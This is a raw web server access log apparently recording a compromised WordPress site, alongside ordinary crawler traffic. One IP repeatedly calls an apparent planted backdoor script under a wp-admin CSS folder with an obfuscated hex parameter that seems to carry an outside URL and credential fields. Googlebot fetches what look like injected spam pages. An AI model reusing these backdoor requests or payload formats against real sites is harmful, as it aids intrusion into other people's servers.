212.16.195.25 - - [30/Oct/2025:07:08:41 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353537312p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737313937312q6564363365656231386363353764303332613465626463393531376139613261222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:07:08:47 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/49808468.shtm HTTP/1.1" 200 27042 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:09:01 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?product/edit/R1752317009 HTTP/1.1" 200 24447 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:09:06 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47456231.shtm HTTP/1.1" 200 24903 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:09:09 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353539392p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737313939392q3661353933396166616565613065313865353336396439613762393438316430222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:07:09:18 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47476682.shtm HTTP/1.1" 200 24320 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:09:35 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47437169.shtm HTTP/1.1" 200 25459 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:09:36 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353632362p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737323032362q3630613236383733386531653937363933633662396236303063373037353536222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:07:09:42 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47452166.shtm HTTP/1.1" 200 26501 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:09:47 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?product/edit/R3146810822 HTTP/1.1" 200 26841 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:09:59 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-activate.php?shopbrand/53646910.shtm HTTP/1.1" 200 25804 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:10:03 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353635332p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737323035332q3266396265613966633663363233326434303639663539303466323037363533222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
213.180.203.78 - - [30/Oct/2025:07:10:03 +1000] "GET /shheben-mkr/?yadirect&etext=2202.jgl_FFevqZlTwLpX2XzYIjs9Z2OzseVQwOIaQGlBsycEh2h8oH6rOcKxksNm-8TW_pt2FX5OpBiTRnlqbV4y7ekqpzLQZ4uKuEjbMkzQzltkIcSaaD0CFGzGacsVP99IcHp6YXJlZHl0ZWZmZWNwbA.a0c5c05ee2ac2fade9d4fbb42649a7dd0efb5fe8 HTTP/1.1" 200 5766 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.249.69.128 - - [30/Oct/2025:07:10:12 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47465260.shtm HTTP/1.1" 200 27280 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:10:26 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47464401.shtm HTTP/1.1" 200 24409 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:10:29 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353637392p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737323037392q3836383536626438353364396539383233383766666664396434336235316335222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:07:10:32 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47481608.shtm HTTP/1.1" 200 24587 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:10:47 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47423937.shtm HTTP/1.1" 200 26459 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:10:55 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353730352p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737323130352q3963346535353239643863646564383931303263306363646466653665373263222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
216.244.66.202 - - [30/Oct/2025:07:10:57 +1000] "GET /robots.txt HTTP/1.1" 301 169 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.202 - - [30/Oct/2025:07:11:00 +1000] "GET /robots.txt HTTP/1.1" 200 77 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
66.249.69.128 - - [30/Oct/2025:07:11:00 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47472579.shtm HTTP/1.1" 200 26165 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:11:06 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47419870.shtm HTTP/1.1" 200 25665 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:11:21 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47434991.shtm HTTP/1.1" 200 26731 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:11:23 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353733332p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737323133332q6233643635663935646462646530383838666165326662626634623432636337222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:07:11:26 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47458963.shtm HTTP/1.1" 200 24393 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:11:41 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-signup.php?shopbrand/52722392.shtm HTTP/1.1" 200 24328 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:11:43 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47476828.shtm HTTP/1.1" 200 25556 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:11:48 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-activate.php?shopbrand/53641976.shtm HTTP/1.1" 200 27010 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:11:49 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353735392p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737323135392q3063656266346335643437626166393962396261653863383031656165616437222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:07:12:01 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47460334.shtm HTTP/1.1" 200 27080 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:12:14 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-activate.php?shopbrand/53637873.shtm HTTP/1.1" 200 26561 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:12:16 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353738362p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737323138362q6639316562373461356635623339656565356136343163346261366664663665222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:07:12:27 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47487696.shtm HTTP/1.1" 200 25831 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:12:41 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47468642.shtm HTTP/1.1" 200 27583 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:12:42 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353831322p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737323231322q6663353561303534623830663063366236616436373130666230616339636466222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:07:12:47 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47450785.shtm HTTP/1.1" 200 25473 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:13:02 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/xmlrpc.php?shopbrand/53837896.shtm HTTP/1.1" 200 26183 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.129 - - [30/Oct/2025:07:13:07 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47432974.shtm HTTP/1.1" 200 25551 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:13:09 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353833392p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737323233392q3762636339646638643666386235343434326431633066303438643466653564222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.129 - - [30/Oct/2025:07:13:11 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-signup.php?product/edit/R2003023614 HTTP/1.1" 200 25905 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:13:17 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47484452.shtm HTTP/1.1" 200 26437 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:13:23 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-http-requests-response.php?shopbrand/45609055.shtm HTTP/1.1" 200 26766 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:13:31 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-activate.php?shopbrand/53643353.shtm HTTP/1.1" 200 29700 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:13:36 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353836362p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737323236362q3739396130623661353236343031383030633838363336303363633630353664222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.128 - - [30/Oct/2025:07:13:37 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/xmlrpc.php?oreka/plamodel_menu.html HTTP/1.1" 200 26541 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:13:45 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47457074.shtm HTTP/1.1" 200 23950 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:13:51 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47486341.shtm HTTP/1.1" 200 27397 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:14:04 +1000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313736313737353839342p2231223n22687474703n5p2s5p2s7n733435307631337375312r6r6968696p65722r6q6s6q5p2s3s6p633q7068705s636s64655s6n6326743q313736313737323239342q6133376231616139646133306437383038613238623065376665643762643665222p2232223n223665303066343265343731646161633564336564393330643765306137333532222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33342q35392q36392q37322q38372q3131227q HTTP/1.0" 504 167 "-" "-"
66.249.69.130 - - [30/Oct/2025:07:14:08 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-includes/class-wp-duotone.php?shopbrand/47463066.shtm HTTP/1.1" 200 25702 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.129 - - [30/Oct/2025:07:14:14 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-activate.php?shopbrand/53655080.shtm HTTP/1.1" 200 25621 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.130 - - [30/Oct/2025:07:14:17 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/wp-activate.php?shopbrand/53635183.shtm HTTP/1.1" 200 24403 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.69.128 - - [30/Oct/2025:07:14:25 +1000] "GET /0?fileloc=/home/region-gk.ru/data/www/region-gk.ru/X-HY-1.php?shopbrand/48690258.shtm HTTP/1.1" 200 25771 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.16.195.25 - - [30/Oct/2025:07:14:28 +1000] "GET / HTTP/1.1" 200 2548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
